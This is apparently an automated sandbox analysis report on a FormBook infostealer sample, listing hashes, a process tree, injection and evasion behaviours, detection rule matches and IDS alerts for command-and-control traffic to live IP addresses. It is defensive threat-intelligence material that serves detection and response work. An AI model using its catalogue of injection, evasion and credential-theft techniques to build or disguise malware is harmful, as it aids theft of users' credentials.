Edit tour

Windows Analysis Report
QUOTATION#050125.exe

Overview

General Information

Sample name:	QUOTATION#050125.exe
Analysis ID:	1586493
MD5:	824144ca67ee2cea4ae60d3c2367785d
SHA1:	55b1d429a2941c13863553372391c6d6f8bbf374
SHA256:	0fccb2e8cc5af7ebd69241df3855983165849d4c0e30629b5e52054bf4dd0ba1
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64native

QUOTATION#050125.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\QUOTATION#050125.exe" MD5: 824144CA67EE2CEA4AE60D3C2367785D)

svchost.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\QUOTATION#050125.exe" MD5: B7C999040D80E5BF87886D70D992C51E)

RAVCpl64.exe (PID: 7360 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)

cmdkey.exe (PID: 5648 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)

firefox.exe (PID: 2484 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.2649523005.0000000009250000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.6080645951.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.6080568851.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#050125.exe, ParentProcessId: 6920, ParentProcessName: QUOTATION#050125.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ProcessId: 7456, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#050125.exe, ParentProcessId: 6920, ParentProcessName: QUOTATION#050125.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ProcessId: 7456, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:30:06.882396+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49713	194.9.94.85	80	TCP
2025-01-09T08:30:30.448977+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49717	45.33.23.183	80	TCP
2025-01-09T08:30:44.403119+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49721	104.21.64.1	80	TCP
2025-01-09T08:30:58.083788+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49725	199.192.21.169	80	TCP
2025-01-09T08:31:21.375336+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49729	47.83.1.90	80	TCP
2025-01-09T08:31:34.876866+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49733	13.248.169.48	80	TCP
2025-01-09T08:31:49.894055+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49737	160.25.166.123	80	TCP
2025-01-09T08:32:03.248795+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49741	172.67.132.227	80	TCP
2025-01-09T08:32:27.370105+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49745	136.243.64.147	80	TCP
2025-01-09T08:32:42.060951+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49749	202.95.11.110	80	TCP
2025-01-09T08:32:55.548709+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49753	76.223.54.146	80	TCP
2025-01-09T08:33:09.276294+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49757	103.106.67.112	80	TCP
2025-01-09T08:33:22.889209+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49761	104.21.64.1	80	TCP
2025-01-09T08:33:39.628725+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49762	194.9.94.85	80	TCP
2025-01-09T08:33:52.951673+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49766	45.33.23.183	80	TCP
2025-01-09T08:34:06.564729+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49770	104.21.64.1	80	TCP
2025-01-09T08:34:20.050156+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49774	199.192.21.169	80	TCP
2025-01-09T08:34:45.197545+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49778	47.83.1.90	80	TCP
2025-01-09T08:34:59.515755+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49782	13.248.169.48	80	TCP
2025-01-09T08:35:13.864903+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49786	160.25.166.123	80	TCP
2025-01-09T08:35:27.064785+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49790	172.67.132.227	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:28:46.739000+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49785	160.25.166.123	80	TCP
2025-01-09T08:30:22.438252+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49714	45.33.23.183	80	TCP
2025-01-09T08:30:25.103389+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49715	45.33.23.183	80	TCP
2025-01-09T08:30:27.780997+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49716	45.33.23.183	80	TCP
2025-01-09T08:30:36.487865+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49718	104.21.64.1	80	TCP
2025-01-09T08:30:39.114808+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49719	104.21.64.1	80	TCP
2025-01-09T08:30:41.758679+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49720	104.21.64.1	80	TCP
2025-01-09T08:30:49.973027+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49722	199.192.21.169	80	TCP
2025-01-09T08:30:52.682343+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49723	199.192.21.169	80	TCP
2025-01-09T08:30:55.381122+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49724	199.192.21.169	80	TCP
2025-01-09T08:31:12.876534+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49726	47.83.1.90	80	TCP
2025-01-09T08:31:15.662834+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49727	47.83.1.90	80	TCP
2025-01-09T08:31:18.507822+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49728	47.83.1.90	80	TCP
2025-01-09T08:31:26.858665+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49730	13.248.169.48	80	TCP
2025-01-09T08:31:29.529567+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49731	13.248.169.48	80	TCP
2025-01-09T08:31:32.205590+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49732	13.248.169.48	80	TCP
2025-01-09T08:31:41.263205+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49734	160.25.166.123	80	TCP
2025-01-09T08:31:44.145333+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49735	160.25.166.123	80	TCP
2025-01-09T08:31:47.003606+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49736	160.25.166.123	80	TCP
2025-01-09T08:31:55.304929+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49738	172.67.132.227	80	TCP
2025-01-09T08:31:57.950883+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49739	172.67.132.227	80	TCP
2025-01-09T08:32:00.588502+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49740	172.67.132.227	80	TCP
2025-01-09T08:32:19.097553+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49742	136.243.64.147	80	TCP
2025-01-09T08:32:21.854287+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49743	136.243.64.147	80	TCP
2025-01-09T08:32:24.612958+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49744	136.243.64.147	80	TCP
2025-01-09T08:32:33.368776+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49746	202.95.11.110	80	TCP
2025-01-09T08:32:36.202931+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49747	202.95.11.110	80	TCP
2025-01-09T08:32:39.045962+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49748	202.95.11.110	80	TCP
2025-01-09T08:32:47.538449+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49750	76.223.54.146	80	TCP
2025-01-09T08:32:50.200934+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49751	76.223.54.146	80	TCP
2025-01-09T08:32:52.877471+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49752	76.223.54.146	80	TCP
2025-01-09T08:33:01.167022+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49754	103.106.67.112	80	TCP
2025-01-09T08:33:03.869988+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49755	103.106.67.112	80	TCP
2025-01-09T08:33:07.823624+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49756	103.106.67.112	80	TCP
2025-01-09T08:33:15.037580+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49758	104.21.64.1	80	TCP
2025-01-09T08:33:17.493557+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49759	104.21.64.1	80	TCP
2025-01-09T08:33:20.202664+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49760	104.21.64.1	80	TCP
2025-01-09T08:33:44.949091+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49763	45.33.23.183	80	TCP
2025-01-09T08:33:47.607861+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49764	45.33.23.183	80	TCP
2025-01-09T08:33:50.282769+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49765	45.33.23.183	80	TCP
2025-01-09T08:33:58.644238+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49767	104.21.64.1	80	TCP
2025-01-09T08:34:01.250813+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49768	104.21.64.1	80	TCP
2025-01-09T08:34:03.919071+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49769	104.21.64.1	80	TCP
2025-01-09T08:34:11.943783+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49771	199.192.21.169	80	TCP
2025-01-09T08:34:14.648707+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49772	199.192.21.169	80	TCP
2025-01-09T08:34:17.349309+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49773	199.192.21.169	80	TCP
2025-01-09T08:34:36.701257+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49775	47.83.1.90	80	TCP
2025-01-09T08:34:39.559555+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49776	47.83.1.90	80	TCP
2025-01-09T08:34:42.340276+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49777	47.83.1.90	80	TCP
2025-01-09T08:34:50.485909+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49779	13.248.169.48	80	TCP
2025-01-09T08:34:53.158591+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49780	13.248.169.48	80	TCP
2025-01-09T08:34:56.841845+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49781	13.248.169.48	80	TCP
2025-01-09T08:35:05.235338+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49783	160.25.166.123	80	TCP
2025-01-09T08:35:08.105254+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49784	160.25.166.123	80	TCP
2025-01-09T08:35:19.126359+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49787	172.67.132.227	80	TCP
2025-01-09T08:35:21.778267+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49788	172.67.132.227	80	TCP
2025-01-09T08:35:24.424871+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49789	172.67.132.227	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: QUOTATION#050125.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: QUOTATION#050125.exe	ReversingLabs: Detection: 68%
Source: QUOTATION#050125.exe	Virustotal: Detection: 63%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2649523005.0000000009250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.6080645951.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.6080568851.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: QUOTATION#050125.exe

Joe Sandbox ML: detected

Source: QUOTATION#050125.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: cmdkey.pdbGCTL source: svchost.exe, 00000002.00000003.2604333762.0000000003213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636124473.0000000003200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: QUOTATION#050125.exe, 00000000.00000003.2046461469.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000000.00000003.2050896599.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550014874.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553539900.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2635545148.0000000002C27000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6080846362.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2638736740.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6080846362.00000000030BD000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: QUOTATION#050125.exe, 00000000.00000003.2046461469.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000000.00000003.2050896599.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2550014874.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553539900.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000005.00000003.2635545148.0000000002C27000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6080846362.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.2638736740.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6080846362.00000000030BD000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cmdkey.pdb source: svchost.exe, 00000002.00000003.2604333762.0000000003213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2636124473.0000000003200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000007C5C000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000035FC000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6079587429.000000000290D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: RAVCpl64.exe, 00000004.00000002.7128342705.0000000007C5C000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000035FC000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6079587429.000000000290D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004BC2A2 FindFirstFileExW,	0_2_004BC2A2
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F68EE FindFirstFileW,FindClose,	0_2_004F68EE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_004F698F
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004ED076
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004ED3A9
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004F9642
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004F979D
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_004F9B2B
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004EDBBE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_004F5C97

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov ebx, 00000004h	2_2_079404E8
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_006484E8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_02EE04E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49713 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49751 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49718 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49724 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49721 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49719 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49715 -> 45.33.23.183:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49717 -> 45.33.23.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49730 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49714 -> 45.33.23.183:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49725 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49731 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49716 -> 45.33.23.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49720 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49729 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49743 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49742 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49749 -> 202.95.11.110:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49761 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 45.33.23.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49732 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49746 -> 202.95.11.110:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 45.33.23.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49734 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49723 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49727 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49747 -> 202.95.11.110:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49735 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49722 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49726 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49737 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49745 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49739 -> 172.67.132.227:80
